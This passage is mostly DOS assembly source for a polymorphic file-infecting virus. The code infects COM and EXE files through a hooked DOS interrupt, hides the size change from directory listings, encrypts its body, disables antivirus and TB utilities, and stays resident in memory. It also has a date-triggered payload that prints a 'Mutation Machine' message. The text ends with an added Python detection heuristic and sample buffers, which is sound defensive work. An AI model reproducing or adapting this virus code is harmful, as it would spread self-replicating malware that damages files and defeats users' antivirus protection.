mov word ptr ds:(offset dcmsi+1),ax ;start for decoder
mov word ptr ds:(offset stsub+1),ax ;for proper relocation
mov dx,6
call rnd_get
or dx,dx
jz nguv
or eflag,100b ;generates intro with probability 5 : 1
nguv: call EMM
call encode
jc pikon1
mov ax,hip
cmp bheader.flag,0
jne iEXE3
sub ax,103h
mov word ptr ds:(offset header+1),ax ;setting jump in com
jmp short iCOM3
iEXE3: mov header.vIP,ax ;write down ip
iCOM3: mov cx,di
mov dx,offset hbuf
sub cx,dx
call write_file
pikon1: jc ikon
call start_file
mov cx,18h
mov dx,offset header
call write_file
jc ikon
add lenlo,EXTENTION
adc lenhi,0 ;change length
mov dx,25
call rnd_get ;with probability 1 : 25 does not mark
or dx,dx
jz ikon
mov bx,offset ftime
call identify
mov [bx],ax ;mark file
ikon: mov dx,lenlo
mov cx,lenhi
call pos_start
xor cx,cx
call write_file ;alignment to constant length increase
mov ax,5701h
mov cx,ftime
mov dx,fdate
call mhandle ;setting time and date
retn

sublen:
sub word ptr es:[bx],EXTENTION
sbb word ptr es:[bx+2],0
jnc npretn
add word ptr es:[bx],EXTENTION
adc word ptr es:[bx+2],0
npretn: retn

NOUNF=14 ;number of unfriendly programs
titstr db 3,'COM',3,'EXE'
titstr1 db 4,'SCAN',7,'VSHIELD',5,'CLEAN',8,'FINDVIRU',5,'GUARD'
db 8,'VIVERIFY',2,'TB',2,'-V',7,'VIRSTOP',3,'NOD',4,'HIEW'
db 5,'PASCA',7,'NETENVI',6,'F-PROT',6,'CHKDSK'

check:
push bx
push cx
push si
push di
push ds
push es
push ax
mov si,dx
mov bx,si
xor di,di
mov cx,LENFNB
ol1: lodsb
cmp al,'\'
je stfn
cmp al,'/'
je stfn
cmp al,':'
jne nstfn
stfn: mov bx,si
nstfn: cmp al,'.'
jne itnb1
mov di,si
itnb1: or al,al
jz whname
loop ol1
jmp short oinok
whname: cmp di,bx
jbe oinok
mov si,di
mov di,offset titstr
push cs
pop es

call compare
je porok
call compare
jne oinok ;COM or EXE ?

porok: mov cl,NOUNF+1
mov si,bx
mov di,offset titstr1
ol2: push cx
call compare
pop cx
je fkrpg
loop ol2 ;check for unfriendly progs
oiok: clc
okon: pop ax
pop es
pop ds
pop di
pop si
pop cx
pop bx
retn
fkrpg: cmp cx,2
ja nvpst ;if F-PROT or CHKDSK switch off stealth
pop ax
push ax
cmp ah,4bh ;execute ?
jne nvpst
mov byte ptr cs:(offset rpps1+1),offset ndnxt-offset con1
nvpst: cmp cx,1
je oiok ;can infect CHKDSK
oinok: stc
jmp okon

compare:
push si
mov cl,byte ptr es:[di]
inc di
mov ax,di
add ax,cx
push ax
popdp: lodsb
cmp al,'a'
jb ponmp
cmp al,'z'
ja ponmp
sub al,('a'-'A')
ponmp: scasb
loope popdp
pop di
pop si
retn

;************** 21h handler *************

infname: ;in ds:dx is file name
push ax
push bx
push cx
push si
push di
push bp
push ds
push es

call eliminate_av

call set_on_24
mov ax,4300h
call int21
mov cs:attrib,cx
mov ax,4301h
xor cx,cx
call int21
jc errnd_l1
mov ax,3d02h
call int21
jc errnd_l2
push dx
push ds
push cs
pop ds
push cs
pop es
mov handle,ax
call infect
mov ah,3eh
call mhandle
pop ds
pop dx
errnd_l2: mov ax,4301h
db 0b9h
attrib dw ? ;mov cx,attrib
call int21
errnd_l1: call set_off_24
pop es
pop ds
pop bp
pop di
pop si
pop cx
pop bx
pop ax
retn

res21:
sti
rpps1: jmp short con1 ;switched jump for switching off stealth
con1: cmp ah,11h
je dtrad
cmp ah,12h
jne dnxt
dtrad: push bx
push es
push ax
mov ah,2fh
call int21
pop ax
call int21
cmp al,0ffh
je dterr
push ax
cmp byte ptr es:[bx],0ffh
jne nexp
add bx,7
nexp: add bx,17h
call identify
pop ax
jnc dterr
add bx,1dh-17h
call sublen
dterr: pop es
pop bx
iret
dnxt: cmp ah,4eh
je dffh
cmp ah,4fh
jne ndnxt
dffh: push bx
push es
push ax
mov ah,2fh
call int21
pop ax
call int21
jc ret21
push ax
add bx,16h
call identify
pop ax
jnc ret21_stc
add bx,1ah-16h
call sublen
ret21_stc:
clc
ret21:
pop es
pop bx
rf2: push ax
push bp
mov bp,sp
lahf
mov [bp+08h],ah
pop bp
pop ax
iret
ndnxt: cmp ah,31h
je trmsr
cmp ah,4ch
jne nkprg
mov byte ptr cs:(offset rpps1+1),0
trmsr: call eliminate_av
nkprg: cld
push dx
cmp ax,4b00h
je infac
cmp ax,6c00h
jne nxts
test dl,00010010b
mov dx,si
jnz saveh
nxts: cmp ah,3ch
je saveh
cmp ah,5bh
je saveh
cmp ah,3eh
jne jornd_l21
cmp bx,cs:chandle
jne jornd_l21
or bx,bx
jz jornd_l21
mov cs:chandle,0
call int21
jc pdxrf2
push ds
push cs
pop ds
mov dx,offset fname
call infname
pop ds
miretc: clc
pdxrf2: pop dx
jmp rf2
jornd_l21: pop dx
cli
jmp cs:oriv21

infac:
call check
jc jornd_l21
call infname
jmp short jornd_l21

saveh:
cmp cs:chandle,0
jne jornd_l21
call check
jc jornd_l21
mov cs:rhdx,dx
pop dx
push dx
call int21
db 0bah
rhdx dw ? ;mov dx,rhdx
jc pdxrf2
push cx
push si
push di
push es
mov si,dx
mov di,offset chandle
push cs
pop es
stosw
mov cx,LENFNB
rep movsb
pop es
pop di
pop si
pop cx
jmp short miretc

NUMTBN=4
tbname db 'TBMEMXXX','TBCHKXXX','TBDSKXXX','TBFILXXX'

eliminate_av:
push ax
push dx
push ds
mov ah,0ffh
xor bl,bl
int 13h ;eliminates NOHARD
mov ah,0feh
int 13h ;eliminates NOFLOPPY
mov ax,0fa02h
mov dx,5945h
mov bl,31h
int 16h ;eliminates VSAFE
push cs
pop ds
mov ah,52h
int 21h
les bx,es:[bx+22h]
next_device:
mov si,offset tbname-8
mov cx,NUMTBN
next_tb_utility:
push cx
add si,8
lea di,[bx+0ah]
mov cx,4
push si
repe cmpsw
pop si
pop cx
loopne next_tb_utility
jne not_tb_utility
or byte ptr es:[0016h],01h ;eliminates TB-utility
not_tb_utility:
les bx,es:[bx]
cmp bx,0ffffh
jne next_device
pop ds
pop dx
pop ax
retn

owname db 'COMMAND',00h
stsub:
mov ax,0000h
mov cl,4
shr ax,cl
mov dx,cs
add ax,dx
push ax
mov ax,offset mdcs
push ax
retf ;relocation cs:ip

mdcs:
cld
push cs
pop ds
mov ax,DEPTH
sub ax,ssp
dec cx
div cl ;al=ax/3
shl ax,1 ;ax=ax*2/3
add sp,ax ;sp to orig. value

;**************** action *****************

mov cl,ORDER
mov ax,counter
div cl
or ah,ah
jnz nap
mov ah,2ah
int 21h
cmp dl,7
jne nap
mov ah,09h
mov dx,offset mess1
int 21h
mov dx,3cch
in al,dx
and al,11111101b
mov dl,0c2h
out dx,al
mov ah,4ch
int 21h

nap: call eliminate_av ;eliminates AVIR

mov ah,62h
int 21h ;in bx PSP
push bx
xor ax,ax
mov ds,ax
mov ds,word ptr ds:(offset MEMPOS+3)
cmp word ptr owname,'OC'
je pinchb ;already res

;**************** installation into memory ******************

xchg ax,bx
dec ax
mov ds,ax
add ax,ds:[03h]
sub ax,((end_res-start_virus)-1)/16+2-1 ;segment for virus is in ax
mov dx,cs
add dx,(LENVIR-1)/16+1 ;end of virus code
cmp ax,dx
jb tranw
mov dx,cs
add dx,cs:bheader.min ;min memory req.
cmp ax,dx
jb tranw
mov dx,ss
mov si,sp
inc si
mov cl,4
shr si,cl
inc si
add dx,si ;end of stack
cmp ax,dx
jnb intdp
tranw: mov ah,48h
mov bx,0ffffh
int 21h
cmp bx,((end_res-start_virus)-1)/16+2
jnb dbjdv
pinchb: jmp inchb
dbjdv: mov ah,48h
int 21h
dec ax
mov ds,ax
mov word ptr ds:[01h],0000h
add ax,ds:[03h]
sub ax,((end_res-start_virus)-1)/16+2-1 ;segment for virus is in ax
intdp: mov dl,byte ptr ds:[00h]
mov byte ptr ds:[00h],'M'
sub word ptr ds:[03h],((end_res-start_virus)-1)/16+2
mov ds:[12h],ax
mov ds,ax
mov byte ptr ds:[00h],dl
inc ax
mov word ptr ds:[01h],ax
mov word ptr ds:[03h],((end_res-start_virus)-1)/16+1
push ds
pop es
push cs
pop ds

inc counter ;generation

mov si,offset owname
mov di,08h
movsw
movsw
movsw
movsw ;name of owner
mov es,ax
xor si,si
mov di,si
mov cx,LENVIR
rep movsb ;copying of body
mov si,offset zencode
mov cx,(zenden-zencode)
rep movsb ;copying of necessary routines
xor ax,ax
mov es:chandle,ax ;initialisation of variable
mov ds,ax
mov ax,ds:046ch
mov es:rnd1,ax
mov ax,ds:046eh
mov es:rnd2,ax ;initialisation rnd_get
mov byte ptr ds:(offset MEMPOS),0eah
mov word ptr ds:(offset MEMPOS+1),offset res21
mov word ptr ds:(offset MEMPOS+3),es
cli
mov ax,ds:(4*21h)
mov word ptr es:oriv21,ax
mov ax,ds:(4*21h+2)
mov word ptr es:(oriv21+2),ax
mov word ptr ds:(4*21h),MEMPOS
mov ds:(4*21h+2),ds
sti
inchb: pop bx
push cs
pop ds
mov es,bx
mov si,offset bheader
cmp [si].flag,0
jne zuEXE
mov di,100h
mov [si].vIP,di
mov [si].vCS,bx
movsb
movsw
jmp short zuCOM
zuEXE: mov ax,cs
sub ax,[si].id ;sub cs from exe header (infected)
add [si].vCS,ax
add ax,[si].vSS
mov ss,ax
zuCOM: mov ds,bx
xor ax,ax
jmp dword ptr cs:bheader.vIP

counter dw 1250
mess1 db 0dh,0ah,'Welcome to the Explosion''s Mutation Machine !',0dh,0ah
db 'Dis is level 3.',0dh,0ah,'$'

end_virus label near

;************************ copied routines and heap ***********************

encode:
mov cx,LENVIR
xor dx,dx ;offset start_virus
call zp1
mov ah,40h
mov bx,handle
pushf
db 9ah ;call oriv21
oriv21 dd ?
jc ec1
cmp ax,cx
ec1: pushf
call zp1
popf
retn
zp1: push cx
mov si,dx
ecmax: mov ax,1234h
mov cx,(LENVIR-1)/2+1
zp2: xor [si],ax
ecaax1: add ax,1234h
inc si
xor [si],ax
ecaax2: add ax,1234h
inc si
loop zp2
pop cx
retn

res24:
mov al,03h
iret

handle dw ?
header strc <>
off24 dw ?
seg24 dw ?
ftime dw ?
fdate dw ?
lenlo dw ?
lenhi dw ?
chandle dw ?
fname db LENFNB dup(?)

retnaddr dw ?
sodec dw ?
hend dw ?
ptei dw ?
ei db 6*25 dup(?)
eei label near
rel dw ?
gba dw ?
eflag db ? ;input flags (0-set DS,1-set SP,2-gen. intro)
hip dw ?
hbuf db LENHBUF dup(?)

end_res label near

virus_segment ends
end stsub
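
An added detection example, not part of the original listing or of the zine: a Python heuristic that scans a decrypted image or memory dump for the interrupt calls and the device-name table used by eliminate_av above. The byte encodings come from the listing's own instructions; the 16-byte look-back window, the rule names and both sample buffers are assumptions constructed for illustration.

```python
"""Heuristic scan for the AV-disabling calls made by eliminate_av."""
from dataclasses import dataclass

# Encodings of instructions that appear in the listing's eliminate_av routine.
INT13 = b"\xcd\x13"              # int 13h
INT16 = b"\xcd\x16"              # int 16h
MOV_AX_FA02 = b"\xb8\x02\xfa"    # mov ax,0fa02h
MOV_DX_5945 = b"\xba\x45\x59"    # mov dx,5945h
MOV_AH = 0xB4                    # opcode of mov ah,imm8
# AH values the listing comments as eliminating NOHARD and NOFLOPPY.
INT13_AH_RULES = {0xFF: "int13-ah-ff", 0xFE: "int13-ah-fe"}
# Device names compared against the DOS device chain in the listing.
TB_NAMES = (b"TBMEMXXX", b"TBCHKXXX", b"TBDSKXXX", b"TBFILXXX")
WINDOW = 16  # assumption: bytes to look back from an INT for register loads


@dataclass(frozen=True)
class Finding:
    offset: int
    rule: str


def _find_all(data, needle):
    """Yield every offset at which needle occurs in data."""
    pos = data.find(needle)
    while pos != -1:
        yield pos
        pos = data.find(needle, pos + 1)


def _last_ah_load(window):
    """Return the immediate of the last `mov ah,imm8` in window, or None."""
    idx = window.rfind(bytes([MOV_AH]))
    if idx == -1 or idx + 1 >= len(window):
        return None
    return window[idx + 1]


def scan(data):
    """Return findings sorted by offset; an empty list means no rule matched."""
    findings = []
    for off in _find_all(data, INT16):
        window = data[max(0, off - WINDOW):off]
        # Both register loads must sit just before the INT 16h, in any order.
        if MOV_AX_FA02 in window and MOV_DX_5945 in window:
            findings.append(Finding(off, "int16-ax-fa02-dx-5945"))
    for off in _find_all(data, INT13):
        window = data[max(0, off - WINDOW):off]
        rule = INT13_AH_RULES.get(_last_ah_load(window))
        if rule:
            findings.append(Finding(off, rule))
    # One TB name alone is weak evidence; require the whole table.
    if all(name in data for name in TB_NAMES):
        findings.append(Finding(data.find(TB_NAMES[0]), "tb-device-name-table"))
    return sorted(findings, key=lambda f: f.offset)


# Constructed sample: the opening instructions of eliminate_av after 8 NOPs,
# followed by the four device names.
SAMPLE_IMAGE = (
    bytes([0x90] * 8)
    + bytes.fromhex("50 52 1e b4 ff 32 db cd 13 b4 fe cd 13 "
                    "b8 02 fa ba 45 59 b3 31 cd 16")
    + b"".join(TB_NAMES)
)
# Constructed benign sample: ordinary keyboard and disk BIOS calls, one name.
BENIGN_IMAGE = bytes.fromhex("b4 00 cd 16 b4 02 cd 13") + b"TBMEMXXX"

if __name__ == "__main__":
    for finding in scan(SAMPLE_IMAGE):
        print(f"{finding.offset:#06x}  {finding.rule}")
```

Because the encode routine in the listing XORs the body before it is written to a file, these rules match only an image that has already been decrypted, such as a memory dump.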
